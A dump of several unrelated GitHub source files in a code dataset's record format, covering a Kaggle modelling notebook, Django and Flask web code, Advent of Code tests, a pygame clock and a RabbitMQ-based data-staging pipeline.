%(model_kernelridgereg_cv_rocaucscore, model_kernelridgereg_cv_cvscores.mean(), 2 * model_kernelridgereg_cv_cvscores.std()))\nprint(' best parameters: %s' %model_kernelridgereg_cv.best_params_)\n\n# In[ ]:\n\n\n# decision tree regression model setup\nmodel_treereg = DecisionTreeRegressor(splitter='best', min_samples_split=5)\n\n# decision tree regression model fit\nmodel_treereg.fit(x_train, y_train)\n\n# decision tree regression model prediction\nmodel_treereg_ypredict = model_treereg.predict(x_validate)\n\n# decision tree regression model metrics\nmodel_treereg_rocaucscore = roc_auc_score(y_validate, model_treereg_ypredict)\nmodel_treereg_cvscores = cross_val_score(model_treereg, x, y, cv=20, scoring='roc_auc')\nprint('decision tree regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_treereg_rocaucscore, model_treereg_cvscores.mean(), 2 * model_treereg_cvscores.std()))\n\n# In[ ]:\n\n\n# random forest regression model setup\nmodel_forestreg = RandomForestRegressor(n_estimators=100, min_samples_split=3, random_state=58)\n\n# random forest regression model fit\nmodel_forestreg.fit(x_train, y_train)\n\n# random forest regression model prediction\nmodel_forestreg_ypredict = model_forestreg.predict(x_validate)\n\n# random forest regression model metrics\nmodel_forestreg_rocaucscore = roc_auc_score(y_validate, model_forestreg_ypredict)\nmodel_forestreg_cvscores = cross_val_score(model_forestreg, x, y, cv=20, scoring='roc_auc')\nprint('random forest regression\\n roc auc score: %0.4f, cross validation score: %0.4f (+/- %0.4f)' %(model_forestreg_rocaucscore, model_forestreg_cvscores.mean(), 2 * model_forestreg_cvscores.std()))\n\n# In[ ]:\n\n\n# stan model setup\nmodel_code = \"\"\"\n data {\n int N; // the number of training data\n int N2; // the number of testing data\n int K; // the number of features\n int y[N]; // the response variable\n matrix[N,K] X; // the training matrix\n matrix[N2,K] X_test; // the testing matrix\n }\n parameters {\n vector[K] alpha;\n real beta;\n }\n transformed parameters {\n vector[N] y_linear;\n y_linear = beta + X * alpha;\n }\n model {\n alpha ~ cauchy(0, 10); // cauchy distribution\n for (i in 1:K)\n alpha[i] ~ student_t(1, 0, 0.03); // student t distribution\n y ~ bernoulli_logit(y_linear); // bernoulli distribution, logit parameterization\n }\n generated quantities {\n vector[N2] y_pred;\n y_pred = beta + X_test * alpha;\n }\n\"\"\"\n\nmodel_data = {\n 'N': 250,\n 'N2': 19750,\n 'K': 300,\n 'y': df_data.loc[df_data['datatype_training'] == 1, 'target'],\n 'X': df_data[df_data['datatype_training'] == 1].drop(['id', 'target', 'datatype_training'], axis=1),\n 'X_test': df_data[df_data['datatype_training'] == 0].drop(['id', 'target', 'datatype_training'], axis=1),\n}\n\nmodel_stan = pystan.StanModel(model_code=model_code)\n\n# stan model fit\nmodel_stan_fitted = model_stan.sampling(data=model_data, seed=58)\n\n# With pystan bernoulli distribution, logit parameterization submission, the LB score is 0.859.\n\n# > **Supply or submit the results**\n# \n# Our submission to the competition site Kaggle is ready. 
Any suggestions to improve our score are welcome.\n\n# In[ ]:\n\n\n# prepare testing data and compute the observed value\nx_test = df_data[df_data['datatype_training'] == 0]\ny_test = pd.DataFrame(np.mean(model_stan_fitted.extract(permuted=True)['y_pred'], axis=0),\n columns=['target'], index=df_data.loc[df_data['datatype_training'] == 0, 'id'])\n\n# In[ ]:\n\n\n# summit the results\nout = pd.DataFrame({'id': y_test.index, 'target': y_test['target']})\nout.to_csv('submission.csv', index=False)\n\n# In[ ]:\n\n\n\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample552.py","file_name":"sample552.py","file_ext":"py","file_size_in_byte":20008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70234940648","text":"from django import template\nfrom django.urls import reverse\n\nfrom cciw.bookings.views import BookingStage\n\nregister = template.Library()\n\n\n@register.inclusion_tag(\"cciw/bookings/bookingbar.html\", takes_context=True)\ndef bookingbar(context):\n request = context[\"request\"]\n booking_account = request.booking_account\n logged_in = booking_account is not None\n current_stage = context[\"stage\"]\n has_account_details = logged_in and request.booking_account.has_account_details()\n\n # Tuple of (name, caption, if this a link, url, message if inaccessible):\n msg_need_login = \"Must be logged in to access this\"\n msg_need_account_details = (\n \"Need account details to access this\" if logged_in else \"Must be logged in to access this\"\n )\n stages = [\n (\n BookingStage.LOGIN,\n \"Log in\",\n False,\n \"\",\n 'Go to \"Overview\" and use the \"log out\" link if you need to log in as someone else',\n ),\n (\n BookingStage.ACCOUNT,\n \"Account details\",\n logged_in,\n reverse(\"cciw-bookings-account_details\"),\n msg_need_login,\n ),\n (\n BookingStage.OVERVIEW,\n \"Overview\",\n logged_in,\n reverse(\"cciw-bookings-account_overview\"),\n msg_need_login,\n ),\n (\n BookingStage.PLACE,\n \"Edit camper details\"\n if current_stage == BookingStage.PLACE and \"edit_mode\" in context\n else \"Add new booking\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-add_place\"),\n msg_need_account_details,\n ),\n (\n BookingStage.LIST,\n \"Checkout\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-list_bookings\"),\n msg_need_account_details,\n ),\n (\n BookingStage.PAY,\n \"Pay\",\n logged_in and has_account_details,\n reverse(\"cciw-bookings-pay\"),\n msg_need_account_details,\n ),\n ]\n return {\n \"logged_in\": logged_in,\n \"request\": request,\n \"stages\": stages,\n \"current_stage\": current_stage,\n }\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/bookings/templatetags/bookings.py","file_name":"bookings.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"25562546732","text":"from datetime import datetime\nimport os\nfrom flask import jsonify, current_app, request, session, send_from_directory\nfrom helpers import upload_files\n\n\nclass FileUploadController:\n def __init__(self):\n pass\n\n def upload_avatar(self):\n \"\"\"FileUpload\"\"\"\n \n if request.method == \"POST\" and session.get(\"user_id\"):\n user_folder_name = str(session.get(\"user_id\")) + \"\\\\avatar\"\n file_name = str(session.get(\"user_id\")) + '_' + str(datetime.now().timestamp()).replace(\".\", \"\")\n\n try:\n\n result = upload_files(\n file=request.files[\"file\"],\n 
user_folder_name=user_folder_name,\n file_name=file_name,\n upload_extensions=current_app.config[\"UPLOAD_EXTENSIONS\"],\n upload_path=current_app.config[\"UPLOAD_PATH\"],\n # for now it should be 1 avatar file, so we overwrite if exists\n cb=self.remove_old\n )\n\n except OSError as er:\n print(\"An exception occurred\", er)\n return er, 500\n\n print(\"result:\", result)\n\n # set in session\n session[\"user_avatar\"] = result[\"path\"][\"filename\"] if type(result) == dict and \"ok\" in result.keys() else session.get(\"user_avatar\")\n session.modified = True\n\n # er format\n if type(result) == tuple:\n return result\n\n return jsonify(result)\n\n return \"Invalid Method\", 400\n # return render_template(\"profile.html\", change_password_form=self.get_reset_form())\n\n\n def get_avatar(self, filename):\n dir = os.path.join(current_app.config[\"UPLOAD_PATH\"], str(session.get(\"user_id\")) + \"\\\\avatar\")\n file = os.path.join(dir, filename)\n file_exists = os.path.exists(file)\n if not file_exists:\n return \"\"\n return send_from_directory(dir, filename)\n\n\n def remove_old(self, user_folder_name):\n \"\"\"remove old file\n\n Args:\n user_folder_name (path): user folder path\n\n Returns:\n tuple: ok tuple | er tuple\n \"\"\"\n try:\n path = os.path.join(\n current_app.config[\"UPLOAD_PATH\"],\n user_folder_name,\n )\n dir_exists = os.path.exists(path)\n # print(\"path: \", path, \"dir_exists: \", dir_exists)\n if not dir_exists:\n os.makedirs(path)\n\n old = os.listdir(path)[0] if os.listdir(path) else \"\"\n # print(\"old: \", old)\n file_exists = os.path.exists(os.path.join(path, old))\n\n if file_exists:\n os.remove(os.path.join(path, old))\n # print(\"rm: \", os.path.join(path, old))\n\n return \"ok\", 204\n \n except OSError as er:\n print('An exception occurred', er)\n return er, 500","repo_name":"AH-SALAH/CS50X","sub_path":"week-9/pSet-9/finance/controllers/fileuploadctrl.py","file_name":"fileuploadctrl.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3129714060","text":"from pytest import fixture, mark\r\nfrom src.day_9 import count_tail_squares, move_head, move_tail, count_last_knot_squares\r\n\r\n\r\n@fixture()\r\ndef head_data():\r\n return \"\"\"R 4\r\nU 4\r\nL 3\r\nD 1\r\nR 4\r\nD 1\r\nL 5\r\nR 2\"\"\".splitlines()\r\n\r\n\r\n@mark.parametrize(\"x, y, direction, spaces, result\", (\r\n (0, 0, \"L\", \"2\", (-2, 0)),\r\n (0, 0, \"R\", \"2\", (2, 0)),\r\n (0, 0, \"U\", \"2\", (0, 2)),\r\n (0, 0, \"D\", \"2\", (0, -2)),\r\n))\r\ndef test_move_head(x, y, direction, spaces, result):\r\n assert move_head(x, y, direction, int(spaces)) == result\r\n\r\n\r\n@mark.parametrize(\"head_x, head_y, tail_x, tail_y, result\", (\r\n (-2, 0, 0, 0, (-1, 0)),\r\n (2, 0, 0, 0, (1, 0)),\r\n (0, 2, 0, 0, (0, 1)),\r\n (0, -2, 0, 0, (0, -1)),\r\n (2, 4, 4, 3, (3, 4))\r\n))\r\ndef test_move_tail(head_x, head_y, tail_x, tail_y, result):\r\n assert move_tail(head_x, head_y, tail_x, tail_y) == result\r\n\r\n\r\ndef test_count_tail_squares(head_data):\r\n assert count_tail_squares(head_data) == 13\r\n\r\n\r\ndef test_last_knot_squares(head_data):\r\n assert count_last_knot_squares(head_data) == 1\r\n\r\n\r\ndef test_last_knot_squares_additional_motion():\r\n assert count_last_knot_squares(\"\"\"R 5\r\nU 8\r\nL 8\r\nD 3\r\nR 17\r\nD 10\r\nL 25\r\nU 20\"\"\".splitlines()) == 
36\r\n","repo_name":"cdsre/advent_of_code_2022","sub_path":"test/test_day_9.py","file_name":"test_day_9.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6382706892","text":"import pandas as pd\n\n\ndef find_incorrect_values(df):\n incorrect_positions = []\n column_types = {\n 'Fecha': 'Timestamp',\n 'Monto': 'float',\n 'Cliente': 'str', \n 'Proveedor': 'str'\n }\n for index, row in df.iterrows():\n for column, expected_data_type in column_types.items():\n value = row[column]\n actual_data_type = type(value).__name__\n\n if actual_data_type != expected_data_type:\n incorrect_positions.append((column, index+2))\n\n return incorrect_positions","repo_name":"RafaelUV18/payments_project","sub_path":"functions/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12958390326","text":"# Leer archivo JSON\n# JSON = JavaScript Object Notation\nimport json\nimport urllib.request\n\nrespuesta = urllib.request.urlopen('https://jsonplaceholder.typicode.com/todos')\nprint(respuesta)\ncuerpo_respuesta = respuesta.read()\nprint(cuerpo_respuesta)\n\n# Procesamos la respuesta\n\njson_respuesta = json.loads(cuerpo_respuesta.decode('utf-8'))\nprint(json_respuesta)\n\n# Imprimir solo los nombres de las personas\n# JSON se convierte a listas y diccionarios en python\nfor objeto in json_respuesta:\n print(f'Data: [UserID:{objeto[\"userId\"]}]')","repo_name":"alfredohugueth/Curso_universidad_python","sub_path":"CreacionCapaDatosPython/json_python.py","file_name":"json_python.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40390803200","text":"from django.shortcuts import render, HttpResponse\nfrom datetime import datetime\nfrom home.models import contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\n\n# Create your views here.\ndef index(request):\n return render(request, 'home.html')\n\ndef about(request):\n return render(request, 'about.html')\n\ndef services(request):\n return render(request, 'service.html')\n\ndef mailsender(request):\n if request.method == \"POST\":\n sub = request.POST.get('subject')\n \n msg = request.POST.get('message')\n print(sub,msg)\n \n send_mail(\n sub,msg,'mtest01311@gmail.com',\n ['rohan.inamdar222@gmail.com','kavin.sundarr@gmail.com']\n )\n HttpResponse(\" Mail Sent !\")\n messages.success(request, 'Your message has been sent!')\n return render(request,'mailsender.html')\n \n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name')\n email = request.POST.get('email')\n phone = request.POST.get('phone')\n desc = request.POST.get('desc')\n date = datetime.today()\n Contact = contact(name=name, email=email, phone=phone, desc=desc, date = date)\n\n Contact.save()\n #messages.success(request, 'Your message has been sent!')\n return render(request, 'contact.html')\n","repo_name":"irohan0/icecream","sub_path":"icecream/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14348856748","text":"from datetime import datetime as dt\n\nimport pygame\n\npygame.init()\nrun = True\nclock = pygame.time.Clock()\n\nbody = 
pygame.image.load(\"images/main-clock.png\")\nleft_hand = pygame.image.load(\"images/left-hand.png\")\nright_hand = pygame.image.load(\"images/right-hand.png\")\n\nscreen = pygame.display.set_mode((body.get_width(), body.get_height()))\n\n\n# minutes\nleft_hand_angle = dt.now().minute * 6 - 90\n# hours\nright_hand_angle = dt.now().hour % 12 * 30 + dt.now().minute / 60 * 30 - 90\n\n\nwhile run:\n clock.tick(1)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n right_hand_rotated = pygame.transform.rotate(right_hand, -right_hand_angle)\n right_hand_x = body.get_width() / 2 - right_hand_rotated.get_width() / 2\n right_hand_y = body.get_height() / 2 - right_hand_rotated.get_height() / 2\n left_hand_rotated = pygame.transform.rotate(left_hand, -left_hand_angle)\n left_hand_x = body.get_width() / 2 - left_hand_rotated.get_width() / 2\n left_hand_y = body.get_height() / 2 - left_hand_rotated.get_height() / 2\n\n screen.fill(\"black\")\n screen.blit(body, (0, 0))\n screen.blit(right_hand_rotated, (right_hand_x, right_hand_y))\n screen.blit(left_hand_rotated, (left_hand_x, left_hand_y))\n\n if dt.now().second == 0:\n left_hand_angle += 6\n right_hand_angle += 0.25\n\n pygame.display.flip()\n","repo_name":"Lagman54/pp2-22B030553","sub_path":"TSIS7/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20442271611","text":"import glob\nimport shutil\nimport time\nfrom abc import ABC, abstractclassmethod, abstractmethod\nfrom enum import Enum\nfrom multiprocessing import Process, current_process\nfrom multiprocessing import Queue as mp_queue\nfrom pathlib import Path\nfrom queue import Queue as ser_queue\nfrom threading import Thread\nfrom typing import Callable, List, Tuple\nimport struct\nimport signal\n\nimport numpy as np\n\nfrom ams.config import AMSInstance\nfrom ams.faccessors import get_reader, get_writer\nfrom ams.store import AMSDataStore\nfrom ams.util import get_unique_fn\nfrom ams.rmq_async import RMQConsumer\n\nBATCH_SIZE = 32 * 1024 * 1024\n\n\nclass MessageType(Enum):\n Process = 1\n NewModel = 2\n Terminate = 3\n\n\nclass DataBlob:\n \"\"\"\n Class wrapping input, outputs in a single class\n\n Attributes:\n inputs: A ndarray of the inputs.\n outputs: A ndarray of the outputs.\n \"\"\"\n\n def __init__(self, inputs, outputs):\n self._inputs = inputs\n self._outputs = outputs\n\n @property\n def inputs(self):\n return self._inputs\n\n @property\n def outputs(self):\n return self._outputs\n\n\nclass QueueMessage:\n \"\"\"\n A message in the IPC Queues.\n\n Attributes:\n msg_type: The type of the message. 
We currently support 3 types Process, NewModel, Terminate\n blob: The contents of the message\n \"\"\"\n\n def __init__(self, msg_type, blob):\n if not isinstance(msg_type, MessageType):\n raise TypeError(\"Message Type should be of type MessageType\")\n self.msg_type = msg_type\n self.blob = blob\n\n def is_terminate(self):\n return self.msg_type == MessageType.Terminate\n\n def is_process(self):\n return self.msg_type == MessageType.Process\n\n def is_new_model(self):\n return self.msg_type == MessageType.NewModel\n\n def data(self):\n return self.blob\n\n\nclass Task(ABC):\n \"\"\"\n An abstract interface encapsulating a\n callable mechanism to be performed during\n the staging mechanism.\n \"\"\"\n\n @abstractmethod\n def __call__(self):\n pass\n\n\nclass ForwardTask(Task):\n \"\"\"\n A ForwardTask reads messages from some input queues performs some\n action/transformation and forwards the outcome to some output queue.\n\n Attributes:\n i_queue: The input queue to read input message\n o_queue: The output queue to write the transformed messages\n callback: A callback to be applied on every message before pushing it to the next stage.\n \"\"\"\n\n def __init__(self, i_queue, o_queue, callback):\n \"\"\"\n initializes a ForwardTask class with the queues and the callback.\n \"\"\"\n\n if not isinstance(callback, Callable):\n raise TypeError(f\"{callback} argument is not Callable\")\n\n self.i_queue = i_queue\n self.o_queue = o_queue\n self.callback = callback\n\n def _action(self, data):\n \"\"\"\n Apply an 'action' to the incoming data\n\n Args:\n data: A DataBlob of inputs, outputs to be transformed\n\n Returns:\n A pair of inputs, outputs of the data after the transformation\n \"\"\"\n inputs, outputs = self.callback(data.inputs, data.outputs)\n # This can be too conservative, we may want to relax it later\n if not (isinstance(inputs, np.ndarray) and isinstance(outputs, np.ndarray)):\n raise TypeError(f\"{self.callback.__name__} did not return numpy arrays\")\n return inputs, outputs\n\n def __call__(self):\n \"\"\"\n A busy loop reading messages from the i_queue, acting on those messages and forwarding\n the output to the output queue. In the case of receiving a 'termination' messages informs\n the tasks waiting on the output queues about the terminations and returns from the function.\n \"\"\"\n\n while True:\n # This is a blocking call\n item = self.i_queue.get(block=True)\n if item.is_terminate():\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n break\n elif item.is_process():\n inputs, outputs = self._action(item.data())\n self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(inputs, outputs)))\n elif item.is_new_model():\n # This is not handled yet\n continue\n return\n\n\nclass FSLoaderTask(Task):\n \"\"\"\n A FSLoaderTask reads files from the filesystem bundles the data of\n the files into batches and forwards them to the next task waiting on the\n output queuee.\n\n Attributes:\n o_queue: The output queue to write the transformed messages\n loader: A child class inheriting from FileReader that loads data from the filesystem.\n pattern: The (glob-)pattern of the files to be read.\n \"\"\"\n\n def __init__(self, o_queue, loader, pattern):\n self.o_queue = o_queue\n self.pattern = pattern\n self.loader = loader\n\n def __call__(self):\n \"\"\"\n Busy loop of reading all files matching the pattern and creating\n '100' batches which will be pushed on the queue. 
Upon reading all files\n the Task pushes a 'Terminate' message to the queue and returns.\n \"\"\"\n\n start = time.time()\n for fn in glob.glob(self.pattern):\n with self.loader(fn) as fd:\n input_data, output_data = fd.load()\n row_size = input_data[0, :].nbytes + output_data[0, :].nbytes\n rows_per_batch = int(np.ceil(BATCH_SIZE / row_size))\n num_batches = int(np.ceil(input_data.shape[0] / rows_per_batch))\n input_batches = np.array_split(input_data, num_batches)\n output_batches = np.array_split(output_data, num_batches)\n for j, (i, o) in enumerate(zip(input_batches, output_batches)):\n self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(i, o)))\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n\n end = time.time()\n print(f\"Spend {end - start} at {self.__class__.__name__}\")\n\n\nclass RMQMessage(object):\n \"\"\"\n Represents a RabbitMQ incoming message from AMSLib.\n\n Attributes:\n body: The body of the message as received from RabbitMQ\n \"\"\"\n\n def __init__(self, body: str):\n self.body = body\n\n def header_format(self) -> str:\n \"\"\"\n This string represents the AMS format in Python pack format:\n See https://docs.python.org/3/library/struct.html#format-characters\n - 1 byte is the size of the header (here 12). Limit max: 255\n - 1 byte is the precision (4 for float, 8 for double). Limit max: 255\n - 2 bytes are the MPI rank (0 if AMS is not running with MPI). Limit max: 65535\n - 4 bytes are the number of elements in the message. Limit max: 2^32 - 1\n - 2 bytes are the input dimension. Limit max: 65535\n - 2 bytes are the output dimension. Limit max: 65535\n - 4 bytes are for aligning memory to 8\n\n |__Header_size__|__Datatype__|__Rank__|__#elem__|__InDim__|__OutDim__|...real data...|\n\n Then the data starts at 12 and is structered as pairs of input/outputs.\n Let K be the total number of elements, then we have K pairs of inputs/outputs (either float or double):\n\n |__Header_(12B)__|__Input 1__|__Output 1__|...|__Input_K__|__Output_K__|\n\n \"\"\"\n return \"BBHIHHI\"\n\n def endianness(self) -> str:\n \"\"\"\n '=' means native endianness in standart size (system).\n See https://docs.python.org/3/library/struct.html#format-characters\n \"\"\"\n return \"=\"\n\n def encode(num_elem: int, input_dim: int, output_dim: int, dtype_byte: int = 4) -> bytes:\n \"\"\"\n For debugging and testing purposes, this function encode a message identical to what AMS would send\n \"\"\"\n header_format = self.endianness() + self.header_format()\n hsize = struct.calcsize(header_format)\n assert dtype_byte in [4, 8]\n dt = \"f\" if dtype_byte == 4 else \"d\"\n mpi_rank = 0\n data = np.random.rand(num_elem * (input_dim + output_dim))\n header_content = (hsize, dtype_byte, mpi_rank, data.size, input_dim, output_dim)\n # float or double\n msg_format = f\"{header_format}{data.size}{dt}\"\n return struct.pack(msg_format, *header_content, *data)\n\n def _parse_header(self, body: str) -> dict:\n \"\"\"\n Parse the header to extract information about data.\n \"\"\"\n fmt = self.endianness() + self.header_format()\n if len(body) == 0:\n print(f\"Empty message. skipping\")\n return {}\n\n hsize = struct.calcsize(fmt)\n res = {}\n # Parse header\n (\n res[\"hsize\"],\n res[\"datatype\"],\n res[\"mpirank\"],\n res[\"num_element\"],\n res[\"input_dim\"],\n res[\"output_dim\"],\n res[\"padding\"],\n ) = struct.unpack(fmt, body[:hsize])\n assert hsize == res[\"hsize\"]\n assert res[\"datatype\"] in [4, 8]\n if len(body) < hsize:\n print(f\"Incomplete message of size {len(body)}. 
Header should be of size {hsize}. skipping\")\n return {}\n\n # Theoritical size in Bytes for the incoming message (without the header)\n # Int() is needed otherwise we might overflow here (because of uint16 / uint8)\n res[\"dsize\"] = int(res[\"datatype\"]) * int(res[\"num_element\"]) * (int(res[\"input_dim\"]) + int(res[\"output_dim\"]))\n res[\"msg_size\"] = hsize + res[\"dsize\"]\n res[\"multiple_msg\"] = len(body) != res[\"msg_size\"]\n return res\n\n def _parse_data(self, body: str, header_info: dict) -> np.array:\n data = np.array([])\n if len(body) == 0:\n return data\n hsize = header_info[\"hsize\"]\n dsize = header_info[\"dsize\"]\n try:\n if header_info[\"datatype\"] == 4: # if datatype takes 4 bytes (float)\n data = np.frombuffer(body[hsize : hsize + dsize], dtype=np.float32)\n else:\n data = np.frombuffer(body[hsize : hsize + dsize], dtype=np.float64)\n except ValueError as e:\n print(f\"Error: {e} => {header_info}\")\n return np.array([])\n\n idim = header_info[\"input_dim\"]\n odim = header_info[\"output_dim\"]\n data = data.reshape((-1, idim + odim))\n # Return input, output\n return data[:, :idim], data[:, idim:]\n\n def _decode(self, body: str) -> Tuple[np.array]:\n input = []\n output = []\n # Multiple AMS messages could be packed in one RMQ message\n while body:\n header_info = self._parse_header(body)\n temp_input, temp_output = self._parse_data(body, header_info)\n print(f\"input shape {temp_input.shape} outpute shape {temp_output.shape}\")\n # total size of byte we read for that message\n chunk_size = header_info[\"hsize\"] + header_info[\"dsize\"]\n input.append(temp_input)\n output.append(temp_output)\n # We remove the current message and keep going\n body = body[chunk_size:]\n return np.concatenate(input), np.concatenate(output)\n\n def decode(self) -> Tuple[np.array]:\n return self._decode(self.body)\n\n\nclass RMQLoaderTask(Task):\n \"\"\"\n A RMQLoaderTask consumes data from RabbitMQ bundles the data of\n the files into batches and forwards them to the next task waiting on the\n output queuee.\n\n Attributes:\n o_queue: The output queue to write the transformed messages\n credentials: A JSON file with the credentials to log on the RabbitMQ server.\n certificates: TLS certificates\n rmq_queue: The RabbitMQ queue to listen to.\n prefetch_count: Number of messages prefected by RMQ (impact performance)\n \"\"\"\n\n def __init__(self, o_queue, credentials, cacert, rmq_queue, prefetch_count=1):\n self.o_queue = o_queue\n self.credentials = credentials\n self.cacert = cacert\n self.rmq_queue = rmq_queue\n self.prefetch_count = prefetch_count\n\n # Installing signal callbacks\n p = current_process()\n print(f\"pid = {p.pid}\")\n signal.signal(signal.SIGTERM, self.signal_wrapper(self.__class__.__name__, p.pid))\n signal.signal(signal.SIGINT, self.signal_wrapper(self.__class__.__name__, p.pid))\n self.total_time = 0\n\n self.rmq_consumer = RMQConsumer(\n credentials=self.credentials,\n cacert=self.cacert,\n queue=self.rmq_queue,\n on_message_cb=self.callback_message,\n on_close_cb=self.callback_close,\n prefetch_count=self.prefetch_count,\n )\n\n def callback_close(self):\n \"\"\"\n Callback that will be called when RabbitMQ will close\n the connection (or if a problem happened with the connection).\n \"\"\"\n print(f\"Sending Terminate to QueueMessage\")\n self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n\n def callback_message(self, ch, basic_deliver, properties, body):\n \"\"\"\n Callback that will be called each time a message will be consummed.\n the 
\n\nclass RMQLoaderTask(Task):\n    \"\"\"\n    A RMQLoaderTask consumes data from RabbitMQ, bundles the data into batches\n    and forwards them to the next task waiting on the output queue.\n\n    Attributes:\n        o_queue: The output queue to write the transformed messages\n        credentials: A JSON file with the credentials to log on the RabbitMQ server.\n        cacert: TLS certificate\n        rmq_queue: The RabbitMQ queue to listen to.\n        prefetch_count: Number of messages prefetched by RMQ (impacts performance)\n    \"\"\"\n\n    def __init__(self, o_queue, credentials, cacert, rmq_queue, prefetch_count=1):\n        self.o_queue = o_queue\n        self.credentials = credentials\n        self.cacert = cacert\n        self.rmq_queue = rmq_queue\n        self.prefetch_count = prefetch_count\n\n        # Installing signal callbacks\n        p = current_process()\n        print(f\"pid = {p.pid}\")\n        signal.signal(signal.SIGTERM, self.signal_wrapper(self.__class__.__name__, p.pid))\n        signal.signal(signal.SIGINT, self.signal_wrapper(self.__class__.__name__, p.pid))\n        self.total_time = 0\n\n        self.rmq_consumer = RMQConsumer(\n            credentials=self.credentials,\n            cacert=self.cacert,\n            queue=self.rmq_queue,\n            on_message_cb=self.callback_message,\n            on_close_cb=self.callback_close,\n            prefetch_count=self.prefetch_count,\n        )\n\n    def callback_close(self):\n        \"\"\"\n        Callback that will be called when RabbitMQ closes\n        the connection (or if a problem happened with the connection).\n        \"\"\"\n        print(\"Sending Terminate to QueueMessage\")\n        self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n\n    def callback_message(self, ch, basic_deliver, properties, body):\n        \"\"\"\n        Callback that will be called each time a message is consumed.\n        \"\"\"\n        start_time = time.time()\n        input_data, output_data = RMQMessage(body).decode()\n        row_size = input_data[0, :].nbytes + output_data[0, :].nbytes\n        rows_per_batch = int(np.ceil(BATCH_SIZE / row_size))\n        num_batches = int(np.ceil(input_data.shape[0] / rows_per_batch))\n        input_batches = np.array_split(input_data, num_batches)\n        output_batches = np.array_split(output_data, num_batches)\n\n        for j, (i, o) in enumerate(zip(input_batches, output_batches)):\n            self.o_queue.put(QueueMessage(MessageType.Process, DataBlob(i, o)))\n\n        self.total_time += time.time() - start_time\n\n    def signal_wrapper(self, name, pid):\n        def handler(signum, frame):\n            print(f\"Received SIGNUM={signum} for {name}[pid={pid}]: stopping process\")\n            self.rmq_consumer.stop()\n            self.o_queue.put(QueueMessage(MessageType.Terminate, None))\n            print(f\"Spent {self.total_time} at {self.__class__.__name__}\")\n\n        return handler\n\n    def __call__(self):\n        \"\"\"\n        Busy loop consuming messages from the RabbitMQ queue. Returns once the\n        consumer stops, after a 'Terminate' message has been pushed to the output queue.\n        \"\"\"\n        self.rmq_consumer.run()\n
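\n\n# --- Editor's illustration (an addition, not part of the original module): the batch\n# sizing rule shared by FSLoaderTask and RMQLoaderTask above. Rows are grouped so each\n# batch stays near BATCH_SIZE bytes; the array shapes are made-up examples.\ndef _sketch_batch_split():\n    inputs = np.zeros((1000, 4), dtype=np.float32)\n    outputs = np.zeros((1000, 2), dtype=np.float32)\n    row_size = inputs[0, :].nbytes + outputs[0, :].nbytes  # 16 + 8 = 24 bytes per row pair\n    rows_per_batch = int(np.ceil(BATCH_SIZE / row_size))\n    num_batches = int(np.ceil(inputs.shape[0] / rows_per_batch))\n    for i, o in zip(np.array_split(inputs, num_batches), np.array_split(outputs, num_batches)):\n        assert i.shape[0] == o.shape[0]  # input/output batches stay paired\n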
\n\nclass FSWriteTask(Task):\n    \"\"\"\n    A class representing a task flushing data in the specified output directory\n\n    Attributes:\n        i_queue: The input queue to read data from.\n        o_queue: The output queue to write the path of the saved file.\n        writer_cls: A child class inheriting from FileWriter that writes to the specified file.\n        out_dir: The directory to write data to.\n    \"\"\"\n\n    def __init__(self, i_queue, o_queue, writer_cls, out_dir):\n        \"\"\"\n        Initializes the writer task to read data from the i_queue, write them using\n        the writer_cls and store the data in the out_dir.\n        \"\"\"\n        self.data_writer_cls = writer_cls\n        self.out_dir = out_dir\n        self.i_queue = i_queue\n        self.o_queue = o_queue\n        self.suffix = writer_cls.get_file_format_suffix()\n\n    def __call__(self):\n        \"\"\"\n        A busy loop reading messages from the i_queue, writing the input/output data to a file\n        using the instance's 'writer_cls' and informing the task waiting on the output_q about\n        the path of the file.\n        \"\"\"\n\n        start = time.time()\n        total_bytes_written = 0\n        while True:\n            fn = get_unique_fn()\n            fn = f\"{self.out_dir}/{fn}.{self.suffix}\"\n            is_terminate = False\n            with self.data_writer_cls(fn) as fd:\n                bytes_written = 0\n                while True:\n                    # This is a blocking call\n                    item = self.i_queue.get(block=True)\n                    if item.is_terminate():\n                        is_terminate = True\n                    elif item.is_process():\n                        data = item.data()\n                        bytes_written += data.inputs.size * data.inputs.itemsize\n                        bytes_written += data.outputs.size * data.outputs.itemsize\n                        fd.store(data.inputs, data.outputs)\n                        total_bytes_written += data.inputs.size * data.inputs.itemsize\n                        total_bytes_written += data.outputs.size * data.outputs.itemsize\n                    # FIXME: We currently decide to chunk files to 2GB\n                    # of contents. Is this a good size?\n                    if is_terminate or bytes_written >= 2 * 1024 * 1024 * 1024:\n                        break\n\n            